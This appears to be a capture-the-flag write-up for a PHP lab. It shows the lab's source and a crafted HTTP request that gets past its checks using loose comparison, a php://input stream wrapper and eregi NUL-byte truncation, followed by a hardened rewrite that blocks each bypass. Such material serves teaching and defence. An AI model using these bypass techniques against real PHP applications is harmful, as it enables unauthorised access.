The lab's source (revealed through index.phps):

```php
<?php
error_reporting(0);
echo "<!--index.phps-->";
if (!$_GET['id']) {
    header('Location: index.php?id=1');
    exit();
}
$id = $_GET['id'];
$a  = $_GET['a'];
$b  = $_GET['b'];
if (stripos($a, '.')) {
    echo 'Hahahahahaha';
    return;
}
$data = @file_get_contents($a, 'r');
if ($data == "1112 is a nice lab!" and $id == 0 and strlen($b) > 5
    and eregi("111" . substr($b, 0, 1), "1114") and substr($b, 0, 1) != 4) {
    require("flag.txt");
} else {
    print "work harder!harder!harder!";
}
?>
```
For id, get past the loose comparison with 0 (just try a few values); for data, get past the stripos check by using a PHP stream wrapper instead of a file name; for b, get past eregi with a null-byte (00) truncation. Then build the request:
```http
POST /index.php?id=.&a=php://input&b=%0012345 HTTP/1.1
Host: web.phrack.top:32783
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.87 Safari/537.36
DNT: 1
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en-GB;q=0.6,en;q=0.4
Connection: close
Content-Length: 19

1112 is a nice lab!
```
1. eregi matching can be truncated with %00.
2. eregi matching can be bypassed with an array: ereg operates on strings, so when it is passed an array it returns NULL.
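For comparison, here is a hardened counterpart to the lab's checks. This is an added example, not the lab's code: it assumes data files live under a hypothetical DATA_DIR and that the flag is still read from flag.txt. It closes the three weaknesses the writeup uses: the loose comparison (on PHP before 8, "." == 0 is true) becomes a strict string comparison; the stripos filter becomes an allowlist of bare file names resolved with realpath, so php://input and other wrappers are never opened; and the b check rejects arrays and NUL bytes before matching, then uses preg_match (eregi was removed in PHP 7) with preg_quote so the first byte cannot act as a regex metacharacter. The lab's condition on b is contradictory by design (111X must match 1114 while X is not 4), so once truncation is gone it simply never passes; that is the point of the check.

```php
<?php
declare(strict_types=1);

// Hardened rewrite of the lab's checks (added example, not the lab's own code).
// Assumptions: DATA_DIR is a hypothetical directory of allowed data files.
const DATA_DIR  = __DIR__ . '/data';
const EXPECTED  = "1112 is a nice lab!";

/** id must be the literal string "0": no "." == 0 style coercion. */
function id_is_valid($id): bool
{
    // is_string also rejects the array trick (?id[]=x) that breaks string functions.
    return is_string($id) && $id === '0';
}

/** Only a bare file name inside DATA_DIR is accepted, never a stream wrapper. */
function resolve_data_path($a): ?string
{
    if (!is_string($a) || preg_match('/^[A-Za-z0-9_-]{1,64}\.txt$/', $a) !== 1) {
        return null;
    }
    $base = realpath(DATA_DIR);
    $real = realpath(DATA_DIR . '/' . $a);
    // realpath() resolves symlinks and ".."; the prefix check keeps the file inside DATA_DIR.
    if ($base === false || $real === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

/** Same rule as the lab for b, evaluated without eregi's NUL-byte truncation. */
function b_is_valid($b): bool
{
    // Reject non-strings (array bypass) and NUL bytes (the %00 truncation) before matching.
    if (!is_string($b) || strlen($b) <= 5 || strpos($b, "\0") !== false) {
        return false;
    }
    $first = substr($b, 0, 1);
    // preg_quote stops the first byte acting as a regex metacharacter; /i mirrors eregi.
    return preg_match('/111' . preg_quote($first, '/') . '/i', '1114') === 1
        && $first !== '4';
}

function request_is_valid(array $get): bool
{
    $path = resolve_data_path($get['a'] ?? null);
    if ($path === null) {
        return false;
    }
    $data = file_get_contents($path);
    return $data === EXPECTED
        && id_is_valid($get['id'] ?? null)
        && b_is_valid($get['b'] ?? null);
}

// Self-check with the writeup's query string (constructed input): the wrapper is
// refused before any file is opened, and the other two bypasses fail on their own.
$bypass = ['id' => '.', 'a' => 'php://input', 'b' => "\x0012345"];
var_dump(request_is_valid($bypass));
var_dump(id_is_valid('.'), id_is_valid('0'));
var_dump(b_is_valid("\x0012345"), b_is_valid(['x']));
```

Run with php 7.0 or later; every var_dump for the bypass inputs reports false, and only id_is_valid('0') reports true. The order of the checks matters: the path allowlist runs first so that no attacker-controlled string ever reaches file_get_contents, and the NUL-byte and type checks run before any regex is built from user input.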
http://www.secbox.cn/hacker/1889.html